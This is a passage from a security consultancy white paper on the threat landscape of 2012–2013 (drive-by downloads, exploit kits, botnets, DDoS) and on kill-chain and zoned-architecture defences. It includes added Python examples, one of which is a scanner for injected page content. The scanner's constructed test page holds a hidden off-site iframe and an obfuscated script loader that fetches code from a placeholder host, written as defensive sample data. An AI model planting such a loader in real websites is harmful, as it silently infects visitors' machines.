The number of web-based attacks increased by almost a third in 2012. (Sym) These attacks silently infect enterprise and consumer users when they visit a compromised website. Drive-by download attacks against web browsers have become the top web threat. (ENISA) A drive-by exploit refers to the injection of malicious code into the HTML of websites to exploit vulnerabilities in users’ web browsers. These attacks target software residing on Internet users’ computers (web browser, browser plug-ins and operating system) and infect them automatically when a drive-by download website is visited, without any user interaction.
Typically, attackers infiltrate a legitimate website to install their attack toolkits and malware payloads, unbeknown to the site owner or the potential victims. The malware payload that is dropped by web-attack toolkits is often server-side polymorphic or dynamically generated, rendering enterprises that rely on signature-based antivirus protection unable to protect themselves against these silent attacks. A hidden piece of JavaScript or a few lines of code linking to another website can install malware that is very difficult to detect. (Sym)
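An added example (not from the white paper, Cisco or Symantec) of the check a site owner can run over their own pages to catch the injected content described above: a scanner built on Python’s html.parser that flags off-site iframes that are tiny or styled invisible, off-site script sources, and inline scripts built from the obfuscation constructs common in kit loaders. The page markup, SITE_HOST and the off-site hostnames are constructed placeholders, and the regular expressions are heuristics rather than a complete detector.

```python
"""Scan page HTML for the drive-by injection patterns described above.

Added example, not code from the white paper or any vendor product. The
HTML snippet is constructed; SITE_HOST and the off-site hosts are placeholders.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "www.example.com.au"   # the legitimate site being checked (assumed)

# Style fragments that make an iframe invisible to the visitor.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|"
    r"position\s*:\s*absolute.*?(left|top)\s*:\s*-\d+", re.I)
# Inline-script constructs typical of obfuscated loaders (heuristic only).
OBFUSCATION = re.compile(
    r"\beval\s*\(|\bunescape\s*\(|String\.fromCharCode|document\.write\s*\(", re.I)

# Constructed page: one legitimate embed, one 1x1 hidden off-site iframe,
# one first-party script and one obfuscated inline loader.
CONSTRUCTED_PAGE = """
<html><body>
<h1>Quarterly results</h1>
<iframe src="https://www.example.com.au/video/embed?id=7" width="640" height="360"></iframe>
<iframe src="http://cdn-stat.invalid/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<script src="/js/site.js"></script>
<script>var s=unescape("%3Cscript%20src%3D%27http%3A//x.invalid/a.js%27%3E%3C/script%3E");document.write(s);</script>
</body></html>
"""

class InjectionScanner(HTMLParser):
    """Collects the iframes and scripts a reviewer would want to look at."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            src = a.get("src", "")
            host = urlparse(src).hostname or SITE_HOST   # relative src = same site
            tiny = a.get("width", "").strip() in ("0", "1") or \
                   a.get("height", "").strip() in ("0", "1")
            hidden = bool(HIDDEN_STYLE.search(a.get("style", "")))
            if host != SITE_HOST and (tiny or hidden):
                self.findings.append(("hidden-offsite-iframe", src))
        elif tag == "script":
            self._in_script = True
            src = a.get("src", "")
            host = urlparse(src).hostname
            if host and host != SITE_HOST:
                self.findings.append(("offsite-script", src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser delivers <script> bodies here without entity decoding.
        if self._in_script and OBFUSCATION.search(data):
            self.findings.append(("obfuscated-inline-script", data.strip()[:40]))

def scan_html(html: str) -> list:
    """Return a list of (finding kind, detail) tuples for one page."""
    scanner = InjectionScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

if __name__ == "__main__":
    for kind, detail in scan_html(CONSTRUCTED_PAGE):
        print(f"{kind}: {detail}")
```

Run this over a crawl of your own site and diff the findings against the last known-good run; a new off-site iframe or a new inline script on a page that never had one is the signal, not the absolute count.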
Analysing more than 5 million malicious URLs passing through the Trustwave Secure Web Gateway, Trustwave found that the popular exploits targeted products like Internet Explorer (IE), Adobe Acrobat Reader, Adobe Flash Player, Oracle Java and Microsoft Office. Of all client-side attacks observed, 61% targeted Adobe Reader users via malicious PDFs. (Trustwave)
As we saw earlier in Figure 8, Oracle was the vendor with the most vulnerability disclosures in 2012. In early 2013, Oracle rushed out a security update repairing a Java zero-day vulnerability that was being actively targeted by attackers. Soon after, Oracle released a Java security update to repair 50 vulnerabilities, 49 of which are remotely exploitable by attackers in the browser. This prompted the US-CERT to recommend disabling Java in web browsers.[11]
Another class of attack through web applications is code injection, such as SQL injection (SQLi), cross-site scripting (XSS), cross-site request forgery (CSRF) and Remote File Inclusion (RFI). The goal of these attacks is to extract data, steal credentials or take control of the targeted web server. A significant increase in reported XSS attack cases has been observed in recent years. Moreover, XSS attacks work on any browsing technology, including mobile web browsers. The most critical vulnerability for traditional and Web 2.0 applications is XSS. (ENISA)
Naturally, the majority of web-based attacks exploit the most common vulnerabilities. These attacks are successful primarily because enterprise, government and consumer systems are not up to date with the latest patches for their many IT products.
[11] http://www.us-cert.gov/ncas/alerts/TA13-032A
EXPLOIT KITS
An exploit kit is a purpose-built, ready-to-use software package that automates attack activity. Exploit kits first appeared in 2006 and continue to be popular because they provide attackers with a turnkey solution for installing malware on end-user systems. A sophisticated underground economy provides both the malware that enables hackers to commit their cybercrimes and the ecommerce facilities to sell the financial data and intellectual property they steal. Financially motivated developers keep creating new and better versions, supplying the marketplace with exploit kits. The Blackhole exploit kit remains the most popular. Blackhole exploits vulnerable browser plug-ins such as Java, Adobe Reader and Adobe Flash Player. (ENISA)
A close inspection of Blackhole reveals just how sophisticated malware authors have become. Blackhole is now the world’s most popular and notorious malware exploit kit. It combines remarkable technical dexterity with a Software-as-a-Service rental model that could have come straight from a Harvard Business School MBA case study. And, barring the unlikely takedown by law enforcement, security vendors and IT organisations are likely to be battling it for years to come. (Sophos)
Over the past 12 months we observed significant investment by cybercriminals in toolkits like the Blackhole exploit kit. They’ve built in features such as scriptable web services, APIs, malware quality assurance platforms, anti-forensics, slick reporting interfaces and self-protection mechanisms. In the coming year, you should expect to see a continued evolution in the maturation of these kits, replete with premium features that appear to make access to high quality malicious code even simpler and more comprehensive. (Sophos)
By far, remote access remained the most widely used method of infiltration in 2012. Custom remote access tools are more closely related to common Trojans and malware kits. The skills needed to develop completely custom remote access tools limit this technology to the higher tiers of attackers. Although the complexity and behaviour of these tools introduce additional challenges in antivirus evasion, their limited distribution appears highly effective in preventing detection. Remote access can range from full-on remote desktop to simple bot-like command and control (C&C) channels. Poorly configured remote administration is a leading infection vector, and maintaining that access is often vital to exfiltration. (Trustwave)
2012 saw Trojan development increase more than in any previous time period. (RSA) Zeus is the most popular banking Trojan in use, and the most successful Zeus offshoot so far also surfaced in 2012. Citadel, a banking Trojan that was introduced to the underground early in the year, has evolved into the most sophisticated Trojan business model the world of commercial malware has ever known. It even has the ability to map corporate networks. (RSA)
BOTNETS
A botnet is a large group of compromised computers under the direct control of an attacker (bot master). Compromised systems are called bots (short for web robots) and they communicate with the bot master, who controls them for email spamming, distributing malware, and infecting other systems, turning them into bots. Interestingly, the U.S. was home to 1 in 7 (15%) of global bot-infected computers, with an average lifespan of 13 days. (Sym)
It has been estimated that up to one quarter of all personal computers connected to the internet may be part of a botnet. In 2011, the TDL Botnet infected more than 4.5 million computers and approximately 100,000 unique addresses per day.[12] Check Point found that 63% of organisations are infected with bots, with most organisations infected by a variety of bots. (Check Point) Ever evolving, the more experienced attackers are using smaller botnets with decentralised command and control infrastructure that are more difficult for law enforcement to track and take down.
DENIAL OF SERVICE ATTACKS
DoS attacks are not new, but in recent years they have been gaining in popularity, in large part because the technical barriers to creating such an attack are small and because it is difficult and time consuming to track an attack back to its true source. (AKAMAI)
Hacktivists use DoS attacks to gain notoriety and make a political statement, so they focus on disrupting online services through DoS and distributed denial of service (DDoS) attacks. To achieve this goal, adversaries take control of multiple hosts on one or more networks, without the owners’ knowledge, to launch automated requests at online services such as Domain Name Services (DNS), websites and email.[13]
Figure 17: DoS Attacks on Industry
Source: Arbor Worldwide Infrastructure Security Report Volume XIII 2012
The number of DDoS attacks in 2012 grew significantly from 2011. 2012 saw 768 attacks reported by their customers, a year-over-year increase of more than 200%. This includes lower layer attacks such as SYN floods, UDP floods and many other common types of volumetric attacks, as well as higher level attacks that target the application layer, such as massive amounts of HTTP GET traffic. (AKAMAI)
[12] http://www.scmagazine.com/botnets-the-backdoor-to-the-enterprise-network/article/242016/
[13] For more information about DoS attacks, visit: http://www.dsd.gov.au/publications/csocprotect/ddos_mitigation.htm
Figure 18: DDoS Attack Types
Source: Arbor Worldwide Infrastructure Security Report Vol. XIII 2012
Recent DoS attack traffic volumes are almost impossible for the typical enterprise to defend against. We are now seeing over 10% of DoS attacks exceeding the 60GB threshold. (Prolexic) The largest DDoS attack was a massive 300GB using DNS reflection, launched through open DNS resolvers rather than directly via compromised networks. Because the attacker used DNS amplification, the attacker only needed to control a botnet or cluster of servers able to generate 750Mbps, which is possible with a small botnet.[14]
The DoS attacks associated with Operation Ababil[15] are an example of terrorists expanding their activities and developing new methodologies and tools to make their DoS efforts more effective. Their motivation can be political or religious and their capability varies from low to high. Preferred targets of cyberterrorists are mostly critical infrastructures (eg health, energy, telecommunications, etc.), as their failure causes severe impact on society and government. (ENISA)
DoS attacks can be a diversion
Cybercriminals, too, are involved in DDoS attacks; the goal is often to distract the targeted business while the criminals commit fraud or simply extort money from their victim. (AKAMAI)
In September 2012, the FBI issued a warning to financial institutions that some DDoS attacks are actually being used as a “distraction.” These attacks are launched before or after cybercriminals engage in an unauthorised transaction and are an attempt to avoid discovery of the fraud and prevent attempts to stop it. They may or may not bring the website down, as that’s not the main focus of the attack; the real goal is to divert the attention of the company’s IT staff towards the DDoS attack. Meanwhile, the hackers attempt to break into the company’s network using any number of other methods that may go unnoticed as the DDoS attack continues in the background.[16]
[14] http://www.theregister.co.uk/2013/03/27/spamhaus_ddos_megaflood/
[15] http://analysisintelligence.com/cyber-defense/deconstructing-the-al-qassam-cyber-fighters-assault-on-us-banks/
[16] http://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
6.0 The State of Security Technology Defences
In security everything fails to the lowest common denominator. We are predictable to cyberattackers in that they know our weaknesses (multiple vulnerabilities, poor configurations, gullible people to target for phishing, etc.). They understand our security defences in that they know we use firewalls, logging, some IPS, some DLP, maybe proxies.
Perimeter controls were extremely effective… until about three years ago. Two significant waves have hit already which demonstrate that perimeter defences are inadequate. One is the new wave of advanced, targeted attacks that are multi-vector and are perpetrated by well-funded and well-trained adversaries. Then there is what is called the “ZeusiLeaks Effect”[17] – the pervasive use of high-grade Trojans by thousands of petty criminals and the fact that they are already operating inside the firewalls of almost every Fortune 500 company. External attackers are infecting employee PCs, either deliberately or as a side-effect of financial fraud attacks. Following the successful infection of an employee PC, the corporation is left with a huge blind spot. Most perimeter defence technologies are set up to look at and stop threats outside the firewall and are blind to the ones that have already made it inside.[18]
With what we’ve learned so far in this report about attackers and their methods, it’s interesting to note in the figure below that only 48% of companies use intrusion detection tools and 39% use DLP tools. Consolidated event collection through security event correlation tools is used by only 36% of companies.
Figure 19: Information Security Technology Safeguards in Place
Source: Key findings from the PWC Global State of Information Security Survey 2013
It will be problematic for these organisations because defending against highly skilled, well-funded hackers using sophisticated malware and attack scenarios requires effective people, process and technology defence in depth and diversity of defence tactics. With less than half the companies in the PWC survey using advanced detection tools, they’re easy targets for hackers who use low and slow techniques to evade detection.
[17] http://www.cio.com.au/article/396014/mcafee_rsa_entire_fortune_500_compromised/
[18] http://blogs.rsa.com/rivner/it-security-in-the-age-of-apts/
Findings from NSS Labs,[19] the world’s leading information research and advisory company, show that technology products alone do not provide adequate protection.
In 2011, NSS Labs tested six enterprise network firewall products (including Check Point, Cisco and Juniper). They found that three of the six firewalls crashed when subjected to stability tests, indicating opportunities for denial of service attacks.[20]
In 2012, NSS Labs tested 15 enterprise network intrusion prevention (IPS) products from ten vendors in the industry’s most comprehensive test to date. As indicated in the following graphs, the result was that none of the devices tested achieved 100% block protection.[21]
Figure 20: Number of Undetected Exploits by IPS Product (left pane)
Correlation of Undetected Exploits Between Vendors IPS Products (right pane)
Source: NSS Labs Cybercrime Kill Chain vs Defence Effectiveness November 12
Also in 2012, NSS Labs tested 13 popular endpoint security suites. These endpoint security suites were tested against 144 exploit attack scenarios to measure their effectiveness in protecting Windows computers against exploits which have been publicly available for months (and some for years) prior to the test. Their findings indicated that, with a few notable exceptions, endpoint products are not providing adequate protection from exploits. Even more troubling was the finding that keeping endpoint protection software up-to-date does not yield adequate protection against exploits, as evidenced by coverage gaps for vulnerabilities several years old.[22]
[19] https://www.nsslabs.com/
[20] www.nsslabs.com/reports/network-firewall-group-test-2011
[21] www.nsslabs.com/reports/ips-comparative-analysis-2012
[22] www.nsslabs.com/reports/consumer-avepp-comparative-analysis-exploit-protection
The following figure indicates the percentage of undetected exploits out of 144 exploits:
Figure 21: Endpoint Protection Products – Undetected Exploit
Source: NSS Labs Cybercrime Kill Chain vs Defence Effectiveness November 12
The deficiencies noted in NSS Labs’ test results mean that, based on market share, about 70% of the world is poorly protected. Most vendors lack adequate protection against exploits, and simple evasions like switching from HTTP to HTTPS are often effective in bypassing attack detection.
“Simply put, endpoint protection suites do not prevent a dedicated attacker from compromising a target.” (NSS_2)
7.0 Recommendations
Modern malware and cyberattack methods are a new attack doctrine built to circumvent conventional approaches to information security. Unfortunately, today’s reality is that advanced attack techniques are so successful and rewarding to attackers that organisations must operate under the assumption that such attacks are inevitable.
Prevention and detection of cyberattacks now requires an evolved situational awareness strategy that facilitates the anticipation, discovery and investigation of anomalous behaviour.
While firewalls, IPSs and antivirus software can catch a lot of malware, every corporation should assume that some malicious code has gotten through to infect systems. That means your CIO, business managers and security team should be operating under the assumption that your organisation is already compromised. (NSS_3)
Given the pervasive nature of cyberattacks, it is not possible to protect everything. Security teams will have to focus on protecting the organisation’s most critical information and systems. That changes the definition of successful defence from “keeping attackers out” to “sometimes attackers are going to get in”.
Detection is difficult because there is no single event to indicate compromise. Low and slow actions by skilled attackers will not stand out from the thousands of events occurring in an IT infrastructure every day – the proverbial needle in a haystack. Many victims have been compromised for a long time and relevant logs have long since passed. The majority of breaches take months or more to discover. (Verizon)
SECURITY AS A COUNTERINTELLIGENCE FUNCTION
Situational awareness is being aware of one's surroundings and identifying potential threats and dangerous situations. It is a fundamental building block in collective security and is more of a mindset than a hard skill.
Developing this mindset in light of today’s cyberthreat landscape requires us to rethink our position and start viewing information security more like a counterintelligence function. This new thinking should compel us to operationalise defensive measures such as identifying and prioritising information assets and the systems that store and transmit critical information, developing mitigation strategies and tactics, exercising response plans, creating separate networks for mission critical information assets, and developing an end to end view of network and system activity to improve situational awareness.
Just as traditional intelligence seeks to understand adversaries’ capabilities, actions and intent, the same goals carry over to the cyber domain. Cyber counterintelligence seeks to understand and characterise things like: what sort of attack actions have occurred and are likely to occur; how these actions can be detected and recognised; how they can be mitigated; who the relevant threat actors are; what they are trying to achieve; what their capabilities are, in the form of the tactics, techniques and procedures they have leveraged over time and are likely to leverage in the future; what sort of vulnerabilities, misconfigurations or weaknesses they are likely to target; etc.[23]
[23] http://www.mitre.org/work/cybersecurity/pdf/stix.pdf
Rethink your cybersecurity situation by taking on an “assume you’re breached” mentality.
The cyber counterintelligence approach shares many characteristics of traditional intelligence analysis. The figure below shows the key activities of the classic intelligence Observe-Orient-Decide-Act loop. The loop begins with collecting and correlating a broad range of technical and environmental data and then developing and testing hypotheses about adversary capabilities and intentions. Like traditional intelligence analysis, cyber counterintelligence seeks to provide actionable information to friendly forces.[24]
Figure 22: John Boyd’s Observe-Orient-Decide-Act Loop
Source: http://pogoarchives.org/m/dni/john_boyd_compendium/essence_of_winning_losing.pdf
BREAK THE CYBER KILL CHAIN
Cyber counterintelligence analysis strives to better position cyber defences to prevent or quickly contain cyber intrusions that occur. Cyber counterintelligence analysis is aided by the attack lifecycle model built upon the kill chain framework.[25] In military parlance, a kill chain is a phase-based model to describe the stages of an attack, which then informs ways to prevent such attacks. Kill chain analysis is a model to analyse intrusions in a new way. In a kill chain model, just one mitigation breaks the chain and thwarts the attacker.
Defenders collect and analyse data and correlate it against the stages of an attack. Defensive engagement of the threat across the whole kill chain is critical. The early stages of the kill chain represent an opportunity to proactively detect and mitigate threats before an adversary establishes a foothold.[26]
For example, to compromise a target system, an attacker follows a defined methodology as indicated in the figure below. Ideally, the earlier in the kill chain an attack can be stopped, the better chance you have of stopping the attack.
[24] http://www.mitre.org/work/cybersecurity/pdf/protex3.pdf
[25] http://www.lockheedmartin.com/content/dam/lockheed/data/corporate/documents/LM-White-Paper-Intel-Driven-Defense.pdf
[26] http://www.mitre.org/work/cybersecurity/focus/threat_based_defense.html
Figure 23: Attack Lifecycle
Source: E&Y/ISACA Responding to Targeted Cyberattacks Report, 2013
In a cyberattack, the kill chain defence leverages the fact that a successful attack must complete all stages, from planning and malware introduction to expansion and one or more command and control phases, until the target is identified, manipulated and exfiltrated. The goal of a kill chain defence is to break one or more stages in the attack chain to stop the progress of the attack and force the opponent to start over.
Responding to incidents after the exploit has already occurred is costly, both in the effective impact and in the level of effort necessary to root out the adversary’s established foothold. To be proactive, cyber defenders need to fundamentally change the nature of the game by stopping the adversary’s advance, preferably before the exploit stage of the attack (that is, moving left of the attack). Moving left of the attack requires defenders to evolve from a defensive strategy based primarily on after-the-fact incident investigation and response to one driven by cyber threat intelligence.[27]
In Figure 23 above, the steps left of Establish foothold represent an opportunity to proactively detect and mitigate threats before the adversary establishes a foothold. To the right of Establish foothold, incident detection and response can be exercised along with assurance of mission-critical assets. To best leverage the opportunity for active defence, it is necessary to perform a retrospective analysis of threat characteristics across the entire kill chain and correlate the results to produce tell-tale indicators.[28]
It’s important to remember three things about this method: 1) the attacker must make the entire chain work to succeed; 2) you need only kill one link to stop them; and 3) having detection and kill capability at each point in the enemy’s attack chain gives you the highest probability of success in this defence.[29]
Most detected intrusions will provide a limited set of attributes about a single phase of an intrusion. Analysts must still discover many other attributes for each phase to enumerate the maximum set of options for courses of action. As defenders collect data on adversaries, they will push detection from the latter phases of the kill chain into earlier ones. Detection and prevention at pre-compromise phases also necessitates a response. Defenders must collect as much information on the mitigated intrusion as possible, so that they may synthesise what might have happened should future intrusions circumvent the currently effective protections and detections.[30]
[27] http://www.mitre.org/work/cybersecurity/pdf/stix.pdf
[28] http://www.mitre.org/work/cybersecurity/pdf/active_defense_strategy.pdf
[29] http://www.enterprisecioforum.com/en/blogs/jim-ricotta/cyber-attack-kill-chain-defense
[30] http://www.lockheedmartin.com/content/dam/lockheed/data/corporate/documents/LM-White-Paper-Intel-Driven-Defense.pdf
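An added example (not from the white paper, Lockheed Martin or MITRE) that puts two of the paper’s points into code: the “every step is an AND” view of phishing from the earlier section and the “kill one link” rule here. Constructed host events are correlated against an ordered stage list, the first blocked stage per host is reported together with whether the response belongs left or right of Establish foothold, and the chain’s end-to-end success probability is computed as the product of per-stage pass rates. The stage names, the event tuples and the pass rates are assumptions for illustration, not measured values.

```python
"""Correlate host events against kill-chain stages and find where the chain
was (or could have been) broken.

Added example, not code from the white paper, Lockheed Martin or MITRE.
Stage names, the event log and the pass rates are assumptions.
"""
from collections import defaultdict

# Ordered stages; an intrusion must pass through every one to succeed.
STAGES = ["recon", "delivery", "exploit", "establish_foothold",
          "c2", "lateral_movement", "exfiltration"]
FOOTHOLD = STAGES.index("establish_foothold")

# Constructed events: (host, stage, detecting control, blocked?).
EVENTS = [
    ("ws-17", "delivery", "mail-gateway", False),   # phishing mail delivered
    ("ws-17", "exploit", "endpoint-av", False),     # exploit ran unblocked
    ("ws-17", "c2", "web-proxy", True),             # beacon blocked at the proxy
    ("ws-42", "delivery", "mail-gateway", True),    # attachment stripped
    ("srv-db", "lateral_movement", "ids", False),   # seen, not stopped
    ("srv-db", "exfiltration", "dlp", False),       # seen, not stopped
]

def chain_outcome(events):
    """Per host: stages observed in kill-chain order, the first blocked
    stage (None if nothing was blocked) and whether the chain completed."""
    per_host = defaultdict(dict)
    for host, stage, control, blocked in events:
        per_host[host][stage] = (control, blocked)
    outcome = {}
    for host, seen in per_host.items():
        ordered = [s for s in STAGES if s in seen]
        broken_at = next((s for s in ordered if seen[s][1]), None)
        outcome[host] = {
            "observed": ordered,
            "broken_at": broken_at,
            "completed": broken_at is None and "exfiltration" in seen,
        }
    return outcome

def response_posture(outcome):
    """Left of Establish foothold a block is prevention; right of it a block
    is containment; an unbroken chain needs incident response."""
    posture = {}
    for host, o in outcome.items():
        if o["broken_at"] is None:
            posture[host] = "incident-response"
        elif STAGES.index(o["broken_at"]) < FOOTHOLD:
            posture[host] = "prevented-left-of-foothold"
        else:
            posture[host] = "contained-right-of-foothold"
    return posture

def success_probability(pass_rates):
    """The chain of ANDs: the attacker's end-to-end success probability is the
    product of the per-stage pass rates, so one stage at 0.0 zeroes it."""
    p = 1.0
    for rate in pass_rates:
        p *= rate
    return p

if __name__ == "__main__":
    outcome = chain_outcome(EVENTS)
    for host, posture in response_posture(outcome).items():
        print(host, outcome[host]["observed"], "->", posture)
    print("P(success) with stage pass rates 0.3, 0.5, 0.8, 0.9:",
          success_probability([0.3, 0.5, 0.8, 0.9]))
```

The product model treats stages as independent, which real intrusions are not; its value is in making the “one zero anywhere stops the chain” argument concrete and in showing which hosts still need the costly right-of-foothold response.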
“If the enemy attacks first you can lead him around. In strategy, you have effectively won when you forestall the enemy.” Miyamoto Musashi
Kill chain analysis makes it more effective for organisations to implement appropriate defensive controls at each stage of the attack lifecycle. Clearly, as this author has been advocating for years, the best way to protect yourself is to build a defence-in-depth strategy with multiple layers of security through a well-constructed zoned security architecture.
THE NECESSITY OF A ZONED SECURITY ARCHITECTURE
Current attack scenarios should be shifting your security environment away from the fortress model of security strategies that are perimeter based with disparate security controls operating independently. To combat today’s cyberthreats, your security architecture must be based on strategies like least privilege, defence in depth, diversity of defence, choke point, systems segmentation and dedicated functionality. The security architecture must include concentric layers of protection that provide multiple, diverse and complex protection barriers that an attacker (or automated malware) must penetrate one at a time. This dramatically increases the difficulty of exploitation and the time it takes, giving businesses an increased opportunity to detect and respond to attack activity.
A formal security architecture framework is a foundational model and methodology for developing a tactical security architecture. It provides the fundamental technology components and interconnecting structure required to support the security requirements of the business. The security architecture framework provides for the organisation and placement of the primary functions of service presentation, business logic and secure data storage, and of the internal and external users of information processed through these primary functions. Using this structure of functions, the security architecture overlays the existing IT architectural structure for business solutions development while facilitating the logical grouping of users and devices of similar trust levels and the information assets that require varying protection and controls.
Enterprise networks are composed of users, devices and systems with varying security requirements with regard to confidentiality, integrity, availability, authenticity and non-repudiation. Because the risks facing users, devices and systems are different, it is logical to separate higher risk entities from lower risk entities and group like entities requiring common protection strategies. Like entities can then be grouped into zones.
A zone is a collection of users, devices and systems with a similar level of trust, or those requiring similar protection and controls, logically bound together.
A simple security architecture zone model is shown in the following diagram:
Figure 24: Simple Security Architecture Zone Model
Source: Burton Group, Reference Architecture Decision Point - Zones
Zoning can be viewed as an organising vehicle to reduce architecture complexity, facilitate cross-functional understanding between security, IT infrastructure, applications development and outsource partner teams, and ultimately provide an inherently more secure infrastructure.
Zones are demarcated by perimeters. Perimeter topologies vary in complexity
based on the risk profile of a particular zone. Perimeters are designed specifically
to implement physical and logical separation and isolation mechanisms to control
the communications flow into and out of a zone. The basic mechanism to mediate
perimeters is the firewall. The firewall serves as a policy enforcement point
regarding access control and network traffic. A full risk assessment would
determine the required boundary controls in addition to the firewall such as
application proxies, intrusion prevention systems, strong authentication, and other
security controls.
The real benefit of introducing a security architecture zone model results from the
gradations of protection against the volume, variety, and velocity of information
security threats facing the typical organisation. Zone modelling employs
concentric layers of protection to dramatically increase the difficulty of
exploitation. Concentric layers of protection provide multiple and diverse
protection barriers that an attacker must penetrate one at a time. A properly
constructed zoned security architecture presents formidable challenges to the
attacker and is your best chance of protection: added complexity, the time
required for the attacker to penetrate multiple layers, and the increased
opportunity to detect attack activity.
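The zone model, perimeters and firewall policy enforcement point described above, as an added example that is not part of this white paper or of the Burton Group reference architecture; the zone names, trust levels and permitted flows are constructed, and the model is a simplified adjacency graph rather than any real product's configuration.

```python
from collections import deque

# Constructed (hypothetical) zone model: zone name -> trust level, higher = more trusted.
ZONES = {
    "internet": 0,        # external users, untrusted
    "presentation": 1,    # service presentation tier (DMZ)
    "business_logic": 2,  # application tier
    "data": 3,            # secure data storage
}

# Each permitted adjacency is a perimeter mediated by a firewall acting as the
# policy enforcement point. The flows are constructed so that no layer is skipped.
PERIMETERS = {
    ("internet", "presentation"),
    ("presentation", "business_logic"),
    ("business_logic", "data"),
}

def flow_permitted(src, dst, perimeters=PERIMETERS):
    """Policy enforcement: a flow is permitted only across a defined perimeter
    between adjacent zones; anything else (e.g. internet -> data) is denied."""
    return (src, dst) in perimeters or (dst, src) in perimeters

def perimeters_to_cross(src, dst, perimeters=PERIMETERS):
    """Minimum number of perimeters an attacker starting in `src` must penetrate,
    one at a time, to reach `dst`; None if `dst` is unreachable.
    Breadth-first search over the zone adjacency graph."""
    seen, queue = {src}, deque([(src, 0)])
    while queue:
        zone, hops = queue.popleft()
        if zone == dst:
            return hops
        for a, b in perimeters:
            nxt = b if a == zone else a if b == zone else None
            if nxt is not None and nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, hops + 1))
    return None

def layer_skipping_perimeters(zones=ZONES, perimeters=PERIMETERS):
    """Model check: a perimeter joining zones more than one trust level apart
    collapses the concentric layers and should be flagged for review."""
    return sorted((a, b) for a, b in perimeters if abs(zones[a] - zones[b]) > 1)

def denied_flows(requested, perimeters=PERIMETERS):
    """Given requested (src, dst) flows, return those the zone policy denies."""
    return [f for f in requested if not flow_permitted(*f, perimeters=perimeters)]

if __name__ == "__main__":
    asks = [("internet", "presentation"), ("internet", "data"), ("presentation", "data")]
    print("denied:", denied_flows(asks))
    print("perimeters internet->data:", perimeters_to_cross("internet", "data"))
```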
DEVELOP A SECURITY IMPROVEMENT ROADMAP
One of the best defence strategies against cyberattack is to assess the
effectiveness of your internal people, process, technology and organisational
controls to understand your current state of security. Once you have determined
where gaps exist, you can develop a prioritised risk improvement roadmap to get
to your desired future state of information security.
“In all forms of strategy, it is necessary to maintain the combat stance in
everyday life and to make your everyday stance your combat stance.” Miyamoto Musashi
The following example depicts a high level prioritised, risk based improvement roadmap:
Figure 25: Example of a Prioritised, Risk-based Improvement Roadmap
(Source: Keith Price)
The example improvement roadmap above shows the implementation plan, including
the sequence of implementation for the recommended technologies and service
capabilities. The roadmap shows four distinct streams which run in parallel:
Quick wins & expanded capabilities
Business alignment
Integrated solutions
Optimised capabilities & visibility
The quick wins and expanded capabilities stream expedites initiatives already under
way, expands the full functionality of technologies already deployed, or kicks off
initiatives that can be enabled quickly.
The business alignment stream facilitates development of a governance, risk, and
compliance management system to implement the recommended technologies and
service capabilities. It starts with executive briefings to cultivate support for the
program and includes an expanded security awareness program for all levels of staff.
Asset management and network security architecture align protection efforts.
The integrated solutions stream introduces new technologies necessary to prevent or
detect a sophisticated attack.
The optimised capabilities and visibility stream is designed to enhance the
configuration and vulnerability management programs as well as operational services
around incident management and penetration testing.
8.0 Conclusion
Cybercrime hurts everyone. Not just because of the damage it causes businesses,
governments, and consumers but because it undermines the confidence in ecommerce
and the Internet. In a world where practically everything depends on connection to the
Internet, protection is crucial.
Yet no organisation can afford to eliminate all cyber risks - the cost/benefit
justifications just aren’t there. The trade-off between risk exposure and risk
management is becoming increasingly complex, and there's no silver bullet for
managing cyber risk. Each organisation needs to establish its own risk tolerance
threshold. Some cyber risks will be accepted because the exposure is so small or the
cost too great to eliminate them; others must be mitigated because the potential of a
cyber black swan event is too great.
As this paper has demonstrated, the best response we have today starts with asking
the right questions, understanding attackers’ motives, capabilities and methods, and
knowing where we’re vulnerable, so we have a better chance of protecting ourselves.
To effectively deal with cybercrime, security defence must evolve into a
counterintelligence function that provides us with the requisite knowledge to prevent,
detect and respond to cyberattacks.
Understanding the cyber kill chain and how a zoned security architecture based on
concentric layers of protection can help break a chain of an attack provides a new
approach to security defence. Together with a road map for protection improvements,
these strategies will help you get to your desired future state of information security
while achieving your business goals.
For further cybersecurity counterintelligence reports, see the list of references on page
37.
For more information about how to manage cybersecurity threats, contact Black Swan
Group for a discussion about how the strategies outlined in this paper may help protect
your organisation.
9.0 About the Author
KEITH PRICE
DIRECTOR AND PRINCIPAL CONSULTANT, BLACK SWAN GROUP
[email protected] +61 438 138 535
Keith specialises in information security and IT risk governance, strategy,
architecture and assurance. During a 30 year career, he’s been at the cutting
edge of technology - avionics, land mobile radio, telecoms & PABX, Novell
networking, the emergence of the Internet, Internet banking, large scale B2B, B2C
and B2E ecommerce systems, and pioneering technologies for network security.
More recently as co-founder of the Black Swan Group security consulting practice,
he’s developed a comprehensive set of security and IT governance, architecture,
and assurance methodologies based on international experience, extensive
research, and recognised standards of practice.
His approach to IT and security is based on a deep technical understanding of
enterprise architecture, solutions development, IT infrastructure, and e-commerce
technologies for B2B, B2C and B2E gateways and converged voice, data and
video networks.
He’s been a leader in the IT security industry having served in director positions
for the Australian Information Security Association (2010-2012) and the ISACA
Sydney Chapter (2007-2009).
Educated in the U.S., he has BBus and MSc degrees. His certifications include
CISSP, CISM, & CGEIT.
10.0 About Black Swan Group
Founded in 2010, Black Swan Group has rapidly established itself as a respected
provider of information security and IT risk management services. Our clients
include a number of Australia’s largest corporate, financial, and government
organisations.
Black Swan Group’s exceptionally strong security skills underpin our information
technology, IT operations, risk management and assurance services.
We provide a comprehensive range of information security services to identify and
evaluate IT security risks and design and implement solutions which mitigate
exposures. We support the full project lifecycle - from strategy, architecture,
assessment and assurance through to deployment, operational integration, and
lifecycle management. Our services encompass:
Secure Integration Assurance
Consulting
Architecture and Design
Solutions Integration
Operational Integration
Our core values are integrity, commitment to clients and value delivery. We
provide straight talk and frank advice, unclouded by product sales.
Black Swan Group can work with you to develop effective frameworks and
methodologies for information and technology governance, policy, strategy, risk
